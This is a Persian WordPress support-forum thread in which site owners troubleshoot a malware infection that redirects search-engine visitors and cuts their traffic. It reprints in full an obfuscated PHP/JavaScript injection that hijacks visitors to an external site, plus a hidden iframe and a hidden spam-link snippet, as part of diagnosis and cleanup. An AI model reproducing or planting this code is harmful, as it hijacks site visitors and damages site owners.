ویروسی شدن سایت « انجمن وردپرس فارسی

hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۰۰:۴۷

سلام دوستان
من یه مشکلی دچارش شدم که باعث شده ورودی هام از گوگل تو دو روز اخیر یک چهارم بشه
دوستان کمک کنند اگه راه حلی به ذهنشون می رسه
وقتی با نرم افزار Xenu صفحات داخلیم رو چک می کنم ،نشون می ده که ریدایرکت صورت می گیره
ادرس سایتم هست: http://funfars.ir
کمک کنید لطفا :(
milad200

آفلاین
عضو
تعداد نوشته‌ها: ۵۸۵
تشکر شده: ۳۳۴ بار
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۰۱:۰۹

سلام
به وردپرس خوش آمدید
این صفحه را ببینید و کد معرفی شده را از functions.php پاک بفرمایید
http://forum.wp-persian.com/topic/20378
hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۰۱:۱۴

milad200 گفت:
سلام
به وردپرس خوش آمدید
این صفحه را ببینید و کد معرفی شده را از functions.php پاک بفرمایید
http://forum.wp-persian.com/topic/20378

این صفحه که لینک همین صفحه است
امکانش هست دوباره لینک رو بدید؟
milad200

آفلاین
عضو
تعداد نوشته‌ها: ۵۸۵
تشکر شده: ۳۳۴ بار
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۰۱:۵۶

ببخشید اشتباه کردیم
این لینک
http://forum.wp-persian.com/topic/19799
موفق باشید
hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۱۰:۴۶

بررسی کردم
تو Function همچین کدی نبود!
دوستان راهنمایی کنند
ورودی 2000تاییم از گوگل شده 100 تا!!

سلام دوستان
من هم از ديروز همين مشكل رو دارم؛ ديروز سايتم بعد از چند ثانيه وارد اين آدرس مي‌شد:
http://ultraprivat.ru/index.php?ref=24
امروز وارد اين آدرس:
http://ultraprivat.ru/codes/directlink.php?id=11
در ضمن اين كد، توي فايل functions.php من هم وجود نداشت

<?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

تنها كاري كه من ديروز انجام دادم، نصب سه تا افزونه كش بوده! به نام:
askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
hosein_ras

thaniashar گفت:
سلام دوستان
من هم از ديروز همين مشكل رو دارم؛ ديروز سايتم بعد از چند ثانيه وارد اين آدرس مي‌شد:
http://ultraprivat.ru/index.php?ref=24
امروز وارد اين آدرس:
http://ultraprivat.ru/codes/directlink.php?id=11
در ضمن اين كد، توي فايل functions.php من هم وجود نداشت
<?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
تنها كاري كه من ديروز انجام دادم، نصب سه تا افزونه كش بوده! به نام:
askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.

این افزونه ها کارشون چیه؟
من این افزونه ها رو نصب نکرده بودم

turkm4hdi

آفلاین
عضو
تعداد نوشته‌ها: ۴۹
تشکر شده: ۴۷ بار
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۱۳:۲۵

askapache-crazy-cache.2.0 و db-cache-reloaded-fix.2.2.4 و hyper-cache.
اینا افزونه کش هستن.

من که هرچی گشتم سایتتون درست بود و هیچ جای دیگه ردایرکت نمیشه.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر
ثاني عشر

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۲
تشکر شده: ۷۱ بار
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۱۴:۰۰

turkm4hdi گفت:
من که هرچی گشتم سایتتون درست بود و هیچ جای دیگه ردایرکت نمیشه.

شما به آدرس http://ketabmobile.com رفتيد؟!!!
چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون
master AK

آفلاین
عضو
تعداد نوشته‌ها: ۴۰
تشکر شده: ۲۴ بار
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۱۴:۵۵

thaniashar گفت:

شما به آدرس http://ketabmobile.com رفتيد؟!!!
چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون

سایت شما مشکلی نداره
http://ketabmobile.com/
بدون مشکل لود میشه و بعد از 10 دقیقه ری دایرکت نشد

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر - turkm4hdi - Saeed Fard
hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۲۲ اسفند ۱۳۹۰ - ۲۰:۰۱

می دونم اما وقتی با نرم افزار xenu سرچ می کنم اینجوری میشه
hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۲۳ اسفند ۱۳۹۰ - ۰۹:۵۹

فکر دی کردم تو انجمن وردپرس می تونند مشکلم رو حداقل شناسایی کنند.
Saeed Fard

آفلاین
ناظم
تعداد نوشته‌ها: ۹۸۲
تشکر شده: ۱۶۱۵ بار
# نوشته شده: ۱۲ سال پیش
۲۵ اسفند ۱۳۹۰ - ۱۳:۲۱

درود ;

شما به آدرس http://ketabmobile.com رفتيد؟!!!
چطور ممكنه؟ من تا وارد ميشم، به پنج ثانيه نمي‌كشه كه ردایرکت ميشه؛ آمار سايت هم به نصف رسيده
يعني ممكنه فقط براي بعضي كاربران مشكل داشته باشه؟ آخه چطوري؟ بايد چيكارش كنم؟! ممنون

درسته دوست عزیز ، مثل اینکه این سایت با متا تگ دایرکت میشه ، با قالب پیشفرض وردپرس تست کنید ،، اگه مشکل برطرف نشد ، وردپرس رو از نو بارگذاری کنید ،، اگر هم مشکل از قالب بود فایل های قالب رو چک کنید و اسکریپت مشکوکی وجود داشت پاک کنید ..

می دونم اما وقتی با نرم افزار xenu سرچ می کنم اینجوری میشه

دوست من سایت شما مشکلی نداره ، ولی برای اطمینانتون شما هم همین کاری که گفتم رو انجام بدید ..

موفق باشید ../.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر
ثاني عشر

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۲
تشکر شده: ۷۱ بار
# نوشته شده: ۱۲ سال پیش
۲۶ اسفند ۱۳۹۰ - ۰۹:۰۹

saeidfard گفت:
درود ;
درسته دوست عزیز ، مثل اینکه این سایت با متا تگ دایرکت میشه ، با قالب پیشفرض وردپرس تست کنید ،، اگه مشکل برطرف نشد ، وردپرس رو از نو بارگذاری کنید ،، اگر هم مشکل از قالب بود فایل های قالب رو چک کنید و اسکریپت مشکوکی وجود داشت پاک کنید ..
موفق باشید ../.

با سلام و تشکر
هاستم میگه مشکل از نرم افزارهای ftp هست، درسته؟
من با Anti-Malware هم سیستم رو ویروس کسی‌ کردم ، ویندوز رو هم عوض کردم، هنوز مشکل داره!!
می‌شه منظورتون از اسکریپت مشکوک رو توضیح بدید
ثاني عشر

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۲
تشکر شده: ۷۱ بار
# نوشته شده: ۱۲ سال پیش
۲۷ اسفند ۱۳۹۰ - ۰۰:۳۶

دوستان, مشکلم حل شد؛ مینویسم تا تنها خوری نکرده باشم :-)
بعد از ساعتها گشتن واژه ویروس (+) و تروجان (+) توی انجمن و...؛ و نصب آنتی ویروس وردپرس (+) و آنتی بدافزار وردپرس (+) و ثبت سایت در وبمستر گوگل (+) به نتیجه ای نرسیدم لذا همه فایل و فولدرهای سایتم رو داخل کامپیوتر آپلود کردم » اسکن کردم دیدم ویروس نداره! » بعد از بیش از 10 ساعت ور رفتن مداوم, یه دفعه به ذهنم خورد: درسته که ویروس کش شید آپدیت شده رو دارم و غمی ندارم چون قدرتش رو از (نود32 و آویرا) میگیره!! ولی حالا یک نود32 هم نصب کنم » آره تا نود32 رو نصب و آپدیتش کردم؛ فایل ایندکس روت رو ویروسی شناخت و من هم اینکس بسته ی اصلی وردپرس رو جایگزین کردم؛ اینطور بود که سایتم جون گرفت؛ البته فعلا! نکته اخلاقی: «دیگر به سراغ sheed نخواهم رفت»

توی یک سایتم, بعد از پایان یافتن کدهای ایندکس, کدهایی رو نوشته بود که با این شروع میشد:
<iframe name="SagUTeXYne" src="http://lscab.ru/templates/lscab/kx/index.php?out=1331381254" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe><script type="text/javascript"> .....
توی سایت دیگم هم بعد از کدهای ایندکس, با اینا شروع میشد:
<div style="display:none"><a href="http://www.aydoganweb.com" title="Evden Eve Nakliyat">Evden Eve Nakliyat</a> و 36تا سایت دیگه ...
اگه شما هم با مثل این کدها برخوردید, سریع پاکشون کنین. برای همه تون سایت خوب, پرمحتوا, بی دردسر و بدون ویروسی رو آرزومندم

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
NESTED
ثاني عشر

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۲
تشکر شده: ۷۱ بار
# نوشته شده: ۱۲ سال پیش
۲۷ اسفند ۱۳۹۰ - ۲۳:۵۵

سلام
به اين صفحه برخورد كردم؛ گفتم شايد براي بقيه هم مفيد باشه
http://www.stopbadware.org/home/security#preventing

دوستان كد وبمستر گوگل، دقيقا بايد توي كدوم فايل قرار بگيره؛ براي اين سايت جديدم كه مي‌خوام بذارم، قبول نمي‌كنه!! نمي‌دونم قبلا توي كدوم فايل گذاشتم!! ممنون
hosein_ras

آفلاین
عضو
تعداد نوشته‌ها: ۷
# نوشته شده: ۱۲ سال پیش
۶ فروردین ۱۳۹۱ - ۲۲:۰۶

thaniashar گفت:
سلام
به اين صفحه برخورد كردم؛ گفتم شايد براي بقيه هم مفيد باشه
http://www.stopbadware.org/home/security#preventing

دوستان كد وبمستر گوگل، دقيقا بايد توي كدوم فايل قرار بگيره؛ براي اين سايت جديدم كه مي‌خوام بذارم، قبول نمي‌كنه!! نمي‌دونم قبلا توي كدوم فايل گذاشتم!! ممنون

آقا اینجا تاپیک من هستا
صرفا جخت یادآوری گفتم

وردپرس فارسی

انجمن

ویروسی شدن سایت (۱۷ نوشته)

درباره‌ی این موضوع

برچسب‌ها